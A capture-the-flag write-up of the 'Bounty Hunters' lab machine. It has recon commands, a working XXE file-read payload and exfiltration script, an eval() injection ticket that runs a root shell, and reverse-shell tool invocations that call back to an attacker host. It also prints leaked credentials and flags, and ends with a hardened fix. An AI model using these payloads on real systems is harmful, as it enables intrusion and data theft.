Information Gathering
| IP Address | Open Ports |
|---|---|
| 10.10.11.100 | TCP: 22, 80 |
$ ip='10.10.11.100'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d44cf5799a79a3b0f1662552c9531fe1 (RSA)
| 256 a21e67618d2f7a37a7ba3b5108e889a6 (ECDSA)
|_ 256 a57516d96958504a14117a42c1b62344 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
XXE
$ feroxbuster -u http://10.10.11.100/
http://10.10.11.100/log_submit.php
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title></title>
<cwe></cwe>
<cvss></cvss>
<reward>&ent;</reward>
</bugreport>
#!/bin/bash
# Ask for a file path, wrap it in the XXE payload (php://filter returns the file
# base64-encoded so binary/PHP files survive), POST it the way log_submit.php
# does, and decode the base64 blob the tracker echoes back.
while true; do
    read -r -p "[+] File > " file_path
    xml_payload=$(cat <<EOF
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/read=convert.base64-encode/resource=$file_path"> ]>
<bugreport>
<title></title>
<cwe></cwe>
<cvss></cvss>
<reward>&ent;</reward>
</bugreport>
EOF
)
    # The page sends the XML base64-encoded and then URL-encoded in the "data" field.
    encoded_payload=$(echo -n "$xml_payload" | base64 | tr -d '\n')
    encoded_payload_url=$(python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1]))" "$encoded_payload")
    response=$(curl -s -X POST http://10.10.11.100/tracker_diRbPr00f314.php \
        -H "Host: 10.10.11.100" \
        -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0" \
        -H "Accept: */*" \
        -H "Accept-Language: en-US,en;q=0.5" \
        -H "Accept-Encoding: gzip, deflate" \
        -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
        -H "X-Requested-With: XMLHttpRequest" \
        -H "Origin: http://10.10.11.100" \
        -H "Connection: close" \
        -H "Referer: http://10.10.11.100/log_submit.php" \
        --data "data=$encoded_payload_url" | gzip -d)
    # Extract the base64 runs from the HTML reply. (The original script tested the
    # whole response with =~ first, but that regex also matches the empty string,
    # so the check was always true; testing the grep result is what is meant.)
    base64_match=$(echo "$response" | grep -oP '([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)?')
    if [ -n "$base64_match" ]; then
        decoded_response=$(echo "$base64_match" | base64 -d 2>/dev/null)
        if [ $? -eq 0 ]; then
            echo "SERVER:"
            echo "$decoded_response"
        else
            echo "[!] Decode fail"
        fi
    else
        echo "[!] Not found response"
    fi
done
[+] File > db.php
username:admin
password:m19RoAU0hP41A1sTsq6K
$ ssh development@10.10.11.100
User.txt
10fd99e37ad14788c0c05a92da4dc9f3
Privilege Escalation: TRP00F && Py Bypassing Analysis
TRP00F
https://github.com/MartinxMax/trp00f
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y
$ python trp00f.py --rhost 10.10.16.28 --rport 10000 --lhost 10.10.16.28 --lport 10031 --http 9999
Py Bypassing Analysis
TRP00F has already reported that the current user can run /opt/skytrain_inc/ticketValidator.py with sudo. The script is:
def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    # Evaluates a ticket to check for irregularities.
    code_line = None
    for i, x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                # The whole code line is passed to eval() unsanitised.
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    # DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close()

main()
Conditions for reaching the eval() call:
Line 1: must start with # Skytrain Inc.
Line 2: must start with ## Ticket to; the rest of the line is printed as the destination.
Line 3: must start with __Ticket Code:__.
Line 4: must start with **; the integer before the first + must satisfy % 7 == 4 (11 works), and the whole line, with ** stripped, is then passed to eval(), which is where arbitrary Python gets executed as root.
https://github.com/MartinxMax/Tyrant
# Skytrain Inc
## Ticket to Somewhere
__Ticket Code:__
**11+0==11 and __import__('os').system('/tmp/tyrant') == True
development@bountyhunter:/tmp$ ./tyrant -uid 0 -rhost 10.10.16.28 -rport 443
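As an added example that is not part of this writeup or of the box's own script, here is a hardened replacement for evaluate() that enforces the same four-line format but walks the parsed expression with the ast module, accepting only integer literals joined by +, so the injection ticket above is rejected instead of executed. The names safe_arith and evaluate_safe, and both sample tickets, are mine.

```python
import ast

def safe_arith(expr):
    """Evaluate a ticket-code expression built only from int literals and '+'.
    Any other syntax (names, calls, attributes, comparisons, 'and') raises ValueError,
    so a line containing __import__('os').system(...) is never executed."""
    tree = ast.parse(expr.strip(), mode="eval")

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            return walk(node.left) + walk(node.right)
        raise ValueError("disallowed syntax: " + type(node).__name__)

    return walk(tree)

def evaluate_safe(lines):
    """Same format rules as the box's evaluate(), but without eval()."""
    code_line = None
    for i, x in enumerate(lines):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            body = x.strip().replace("**", "")
            try:
                if int(body.split("+")[0]) % 7 != 4:
                    return False
                return safe_arith(body) > 100   # the "validation number" check
            except (ValueError, SyntaxError):
                return False                    # malformed or non-arithmetic code line
    return False

# Constructed sample tickets: a well-formed one and the injection ticket shown above.
VALID_TICKET = ["# Skytrain Inc\n", "## Ticket to Somewhere\n",
                "__Ticket Code:__\n", "**102+1+2**\n"]
ATTACK_TICKET = ["# Skytrain Inc\n", "## Ticket to Somewhere\n", "__Ticket Code:__\n",
                 "**11+0==11 and __import__('os').system('/tmp/tyrant') == True\n"]
```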
Root.txt
a51cc224d2bd3a9c103331bd01d2d51b